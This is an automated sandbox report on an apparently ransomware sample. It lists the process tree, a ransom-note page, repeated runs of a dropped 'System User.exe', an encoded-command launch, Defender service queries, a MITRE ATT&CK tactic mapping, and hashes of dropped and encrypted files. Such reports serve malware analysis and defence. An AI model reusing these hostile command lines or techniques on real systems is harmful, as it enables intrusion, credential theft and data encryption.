- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text5⤵
- System Location Discovery: System Language Discovery
PID:2080
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff929c3cb8,0x7fff929c3cc8,0x7fff929c3cd84⤵PID:3592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:24⤵PID:5020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:34⤵PID:2592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:84⤵PID:2968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:14⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:14⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:84⤵PID:2812
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w45wvyr4\w45wvyr4.cmdline"3⤵PID:1400
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB64E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD13BC8EF3E11494C85172E965FFA2C2.TMP"4⤵PID:3972
-
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:3076
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:1484
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller3⤵PID:668
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass3⤵PID:1832
-
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2788
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3204
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵PID:3956
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1664
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4832
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
C:\Users\Admin\AppData\Roaming\System User.exe"C:\Users\Admin\AppData\Roaming\System User.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3368
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
152B
MD5c03d23a8155753f5a936bd7195e475bc
SHA1cdf47f410a3ec000e84be83a3216b54331679d63
SHA2566f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA5126ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41
-
Filesize
152B
MD53d68c7edc2a288ee58e6629398bb9f7c
SHA16c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA5120eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f
-
Filesize
116KB
MD5d4601354ecfc37b3f5053dd2913fea46
SHA1d7a8d720b4e3c926004653568c9b9af73039218e
SHA2565c1a5f341783ce158520e7bf210336aa75601bb02612b5d0059de4586b303686
SHA51209724e62be06cad32eddb20c487945e364a52eb524e39b70ca04877bd3203f68a0fcd2cca2d99934bd9f9dd427e93da1bc8fa3aa87b52ed1ce06d10638b3b03a
-
Filesize
5KB
MD5fc57f4a44e7d8da168b0aec1ebd07e81
SHA1ebbbdba51af10eb141f3f6bb3f52777f1ddd3489
SHA256a3f45d8a3d7f180f9c3dcc1ac1002b47930e4b071b35c634eb48529c3179a52c
SHA5126c17d7644396b2e85c6e7628dc2761e86fd231532f50becc2cd8cc0ca48cb533dd69c1e790dcef083301532835c002975506b74e87a5f1baaba1c31e9b974787
-
Filesize
5KB
MD5208805dc32dee88cac7124e29abda264
SHA12903b3e796a6ce9558b91b69a481e1d8d878068b
SHA25659263a63160f106286ae7d5f3a7d5c8a56a5f57360b4111ce085d23c0f0e4745
SHA512a6c8ba87dcd1bb6866e814d6eba609f00bf1722ad1082799ca81599db199be67340e17b89c254f0fbe09ca29b3a7010e0ab3a889429d98390c45d53e27afcbcd
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5a39c85e6c0dad9a344219919b5a2baab
SHA1ff8d20b99adf6865eedd72b51eac555ebd3a4aea
SHA256b80bfefbf4c2836e97cebe0f3d0f91cd68568f79dbd9fc3fbc90f471202bf234
SHA512f2ba5788d6a9623faa6aecb8f3f1efc32a00a0f2ee037bbe85b5f98215f3872cc4ad3557cf69d6cc6183f42f029a0c891c55ea355487524e7ebf7a1244441b9e
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
944B
MD57c8d85aaf580c54e901f3d6968482b51
SHA1bef8b0987808ef80f28f0040a6e94084ff8438c9
SHA2561db55b56c11cb3f79b16ddd010b292950619499c3245ac7664b8f530c4421ee8
SHA51204b7ca56cf966ee4d0b2cbac7cafc9aea3e8f116da26b1bf8924fdcd3480136f912e0491ed0b775d099ef571a791a167f43776e0831fac2dd078835c429f6df2
-
Filesize
944B
MD5a91dc07e15b39a46d314ca39a8df588e
SHA1877b623728477f8663f79801afa5295e74c64404
SHA2569b20cd28716b083005849335aa8b439c6e1000bc3c57eef76654acd7f1063f04
SHA51232c1cab513b30417582318ebcecd7c57429ceaff3cc09dee8a9a82538907c9e3f1695bedbe01937638c9aa11354599bb9bd7810750a4b8bdeea911a83cc04ab3
-
Filesize
944B
MD5e3840d9bcedfe7017e49ee5d05bd1c46
SHA1272620fb2605bd196df471d62db4b2d280a363c6
SHA2563ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f
SHA51276adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376
-
Filesize
944B
MD5c8e142ee24a77ad7f21f6a741d48c8da
SHA12f174ae49dd03c3b2acd2f9cb2f4e1913908e749
SHA256e81cbecfdbc457b5d8aad1fbd1dc29ab05e6425e9921bff30089f074ddfc6961
SHA512ea1c13f3c559afbdfd63a6ecd2ca354612c3c29c2716156d5afcafe6d3fbd0e7eca7b1f03e68f3a28c78cbea5ec430285fa699facad72fc52a37fca207999799
-
Filesize
11KB
MD5ca0def7f8e939cda53123637d4021970
SHA1232cf828ae9fb24d60b4e730f5755a7e07f00126
SHA2566ae7ffe187f22ebfc5fac3cb119c3a2da07c92f5e5ee6098e529d9a60387f238
SHA5120eedb8afcb3e4e8f6773a17dc825920ac28f530fdaddb91798eb0bf2c417c2b10277326e64c6188ff52a680a5f851df38bee1dc442abadece0cc0632f1a8e4b3
-
Filesize
944B
MD54914eb0b2ff51bfa48484b5cc8454218
SHA16a7c3e36ce53b42497884d4c4a3bda438dd4374b
SHA2567e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e
SHA51283ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize10KB
MD5d6d3499e5dfe058db4af5745e6885661
SHA1ef47b148302484d5ab98320962d62565f88fcc18
SHA2567ec1b67f891fb646b49853d91170fafc67ff2918befd877dcc8515212be560f6
SHA512ad1646c13f98e6915e51bfba9207b81f6d1d174a1437f9c1e1c935b7676451ff73a694323ff61fa72ec87b7824ce9380423533599e30d889b689e2e13887045f
-
Filesize
78KB
MD5919023267a38b0b6641b26319901fddf
SHA1dbd25f981353ce0f824fb441a2a0dc2441bdc8da
SHA256c68421f86ca419eac8bb89fcd66b860db60ed4201c16bfa4159436bbbae9401e
SHA512ece9275342a3986ef2ab60e0128ca055ea7e1352c13c05367b62e1296dbf4105d757ce0181a79888f1144f14379dc15518aac87bac81da093036ba1a243bbfbf
-
Filesize
1KB
MD5a4685a071692f06de1598ab7d48bf32c
SHA1dab1b13d36488f6fd192a05d6a1bedc3916e7efc
SHA256c5184874371625c138ecec0bc69a22e42f5b400ac9dc3fd9e60e0ed00625eec8
SHA512c95617bffb7024570b3e81aba1ec4eaf16a32de72177b384c81b4c4719f98d00fdb2a899937ebea61da29ff3237c06991c7f7bebd496d6e0baf2eac41be17dea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD52b1d73395de772dd89111bc444da179a
SHA18743f9599f7ae813b40384ba5a29552d790e74a9
SHA256a952fc786c3998d750cd33aa0c355644e615798a33a231d65402d94a8281a1a6
SHA51221d5a8733e7a2ffbc39ed287bcf759ee63a2aa514f2cbfe72d047db14ee47f8a9c5db7e11476dc1e3df8452a3dc65b7cea11b35111c3878c56ae283242ed02f1
-
Filesize
386B
MD5156a4b3e570d9c7efc0f0094dbceb24e
SHA1ccd7e470b9114884d6e958ab4d8b4c451f493c66
SHA2567443a1bcd15924a389e5da2a0530b6703a35aed61e63cd1a1d7d0699d49a5a77
SHA51290123975819cc2fc3030f94cc8bfce587e8c7efcca8c7ac8a1e99c5f3211c0a50fe16994836fb46fcb3a68b2157259a59f7a5928c19bba2fc3cb4059ecc8efa2
-
Filesize
313B
MD5751dbb5fd7ac8921d91c0e19332a8624
SHA15c790b735d019102dcd33f48d0bd6a9aa1155af6
SHA2563f691e00df42ecfdcf2a63ad52b4d0ee5088f2dcd4d2d76090ab9e348134a7f0
SHA512d2fadfa962296ce410414e7dfd827e943be5aefb64d5dc468c39a16bb5283a89c0132dd0c096b9671dc70a1c6e022d6bc31c5c4f4dc0aa0521113eb77e9bd8a6
-
Filesize
6KB
MD58227cf31c732b85bbed1c99084d065dc
SHA14319660bd19a33052486fe42c6508596ee318eea
SHA256a320ff23d99e60674e676cb6b6d5c2a8e278c1b47eaeb8884e4cf411ccf80ca7
SHA512e3ec1bc1e5a1be5590f1198312ff660f2a156bc6a5a7118b508a95e065fda4a625b5c58d2352961627e51ca6f0f713efb603cf3c2dbcfdbbe07c19594f445840
-
Filesize
634B
MD564874e5ec200a248198f20e134aee323
SHA1ee825efdceba5aa3469fa90395bb75d85195cdf3
SHA256c22d02d7af8cd46842a4b460eeb0af8c06686ff1818bed037f2dc7cf858990c7
SHA512c46a7af296aae0b53737ec1e4067f2b6b7ff0b1ebe2cd930c01a4a02db3c0d221564520ccb02de28642e81758be44a2a6e33ec8ebe09ff9832242d3d23a8cce9
-
C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC
Filesize16B
MD5de8d470801edaba51db074c760f40113
SHA1d40b5599089ac50895d00bfe06e7775bbc742c56
SHA25608ca2b6258ce3681c759189d76f06b98d72ac8f4931af1b892b2edde90b7264b
SHA51293f0dbb8ba622e826307c51972d4cda906d29918777f285cb06941f01ff41794631cb24f5a33496fc85c049a84329b36999e24846153cfbc443fae684cbe3d83